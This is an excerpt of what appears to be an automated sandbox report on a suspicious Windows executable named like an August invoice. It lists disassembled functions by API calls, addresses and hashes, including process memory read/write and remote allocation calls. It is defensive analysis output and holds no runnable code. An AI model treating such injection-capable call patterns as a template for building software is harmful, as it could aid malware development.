                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: CounterPerformanceQuerySleep
                                                          • String ID:
                                                          • API String ID: 2875609808-0
                                                          • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                          • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                          • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                          • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                          • MessageBeep.USER32(00000000), ref: 00460C46
                                                          • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                          • EndDialog.USER32(?,00000001), ref: 00460C83
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                          • String ID:
                                                          • API String ID: 3741023627-0
                                                          • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                          • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                          • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                          • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Destroy$DeleteObjectWindow$Icon
                                                          • String ID:
                                                          • API String ID: 4023252218-0
                                                          • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                          • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                          • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                          • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                          APIs
                                                          • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                          • DeleteObject.GDI32(?), ref: 00455736
                                                          • DeleteObject.GDI32(?), ref: 00455744
                                                          • DestroyIcon.USER32(?), ref: 00455752
                                                          • DestroyWindow.USER32(?), ref: 00455760
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                          • String ID:
                                                          • API String ID: 1489400265-0
                                                          • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                          • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                          • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                          • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                          APIs
                                                            • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                          • DestroyWindow.USER32(?), ref: 00455728
                                                          • DeleteObject.GDI32(?), ref: 00455736
                                                          • DeleteObject.GDI32(?), ref: 00455744
                                                          • DestroyIcon.USER32(?), ref: 00455752
                                                          • DestroyWindow.USER32(?), ref: 00455760
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                          • String ID:
                                                          • API String ID: 1042038666-0
                                                          • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                          • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                          • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                          • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                                          • String ID:
                                                          • API String ID: 2625713937-0
                                                          • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                          • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                                                          • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                          • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                                                          APIs
                                                          • __getptd.LIBCMT ref: 0041780F
                                                            • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                            • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                          • __getptd.LIBCMT ref: 00417826
                                                          • __amsg_exit.LIBCMT ref: 00417834
                                                          • __lock.LIBCMT ref: 00417844
                                                          • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                          • String ID:
                                                          • API String ID: 938513278-0
                                                          • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                          • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                          • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                          • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                          APIs
                                                            • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                          • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                            • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                            • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                          • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                            • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                          • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                          • ExitThread.KERNEL32 ref: 00413D4E
                                                          • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                          • __freefls@4.LIBCMT ref: 00413D74
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                          • String ID:
                                                          • API String ID: 2403457894-0
                                                          • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                          • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                                                          • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                          • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                                                          APIs
                                                            • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                          • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                            • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                            • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                          • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                            • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                          • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                          • ExitThread.KERNEL32 ref: 004151ED
                                                          • __freefls@4.LIBCMT ref: 00415209
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                          • String ID:
                                                          • API String ID: 4247068974-0
                                                          • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                          • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                          • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                          • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 5$8$^
                                                          • API String ID: 0-3622883839
                                                          • Opcode ID: 5b0bf54134f80cff9ca6ce4a8dff4b23300e7e002ba4f74be1d0103a91d53083
                                                          • Instruction ID: 6ee989b57c56cc683e8081b45a60e8d88641feefa2b309a8211b066407c3f2e5
                                                          • Opcode Fuzzy Hash: 5b0bf54134f80cff9ca6ce4a8dff4b23300e7e002ba4f74be1d0103a91d53083
                                                          • Instruction Fuzzy Hash: 82F1B4B1D00649AACB24CFA9C940AEEFBF4EF84300F14856FE455E7351E3B89A45CB56
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: )$U$\
                                                          • API String ID: 0-3705770531
                                                          • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                          • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                          • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                          • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                          APIs
                                                            • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                          • CoInitialize.OLE32(00000000), ref: 0046E505
                                                          • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                          • CoUninitialize.OLE32 ref: 0046E53D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                          • String ID: .lnk
                                                          • API String ID: 886957087-24824748
                                                          • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                          • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                          • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                          • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                          Strings
                                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                          • API String ID: 708495834-557222456
                                                          • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                          • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                          • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                          • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                          APIs
                                                            • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                            • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                            • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                            • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                            • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                          • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                          • String ID: @
                                                          • API String ID: 4150878124-2766056989
                                                          • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                          • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                          • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                          • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID: \$]$h
                                                          • API String ID: 4104443479-3262404753
                                                          • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
